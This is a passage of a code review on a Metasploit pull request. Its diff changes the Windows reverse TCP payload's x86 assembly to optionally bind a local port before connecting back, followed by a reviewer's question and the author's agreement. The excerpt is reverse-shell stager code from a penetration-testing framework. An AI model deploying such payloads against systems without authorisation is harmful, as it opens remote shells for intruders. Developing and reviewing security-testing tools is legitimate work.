lib/msf/core/payload/windows/reverse_tcp.rb

```diff
@@ -141,6 +153,35 @@ def asm_reverse_tcp(opts={})
         push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
         call ebp                ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
         xchg edi, eax           ; save the socket for later, don't care about the value of eax after this
+    ^
+    # Check if a bind port was specified
+    if opts[:bind_port]
+      bind_port    = opts[:bind_port]
+      encoded_bind_port = "0x%.8x" % [bind_port.to_i,2].pack("vn").unpack("N").first
+      asm << %Q^
+        xor eax, eax
+        push 11
+        pop ecx
+        push_0_loop:
+        push eax               ; if we succeed, eax will be zero, push it enough times
+                               ; to cater for both IPv4 and IPv6
+        loop push_0_loop
+
+                         ; bind to 0.0.0.0/[::], pushed above 
+        push #{encoded_bind_port}   ; family AF_INET and port number
+        mov esi, esp           ; save a pointer to sockaddr_in struct
+        push #{sockaddr_size}  ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used)
+        push esi               ; pointer to the sockaddr_in struct
+        push edi               ; socket
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
+        call ebp               ; bind( s, &sockaddr_in, 16 );
+      ^
+    end
+    
+    asm << %Q^
+        push #{encoded_host}    ; host in little-endian format
+        push #{encoded_port}    ; family AF_INET and port number
+        mov esi, esp  
```

Comment:
Do these belong in the conditional statement?

Reply:
I believe you are correct. Outside of the conditional it is redundant. I'll update.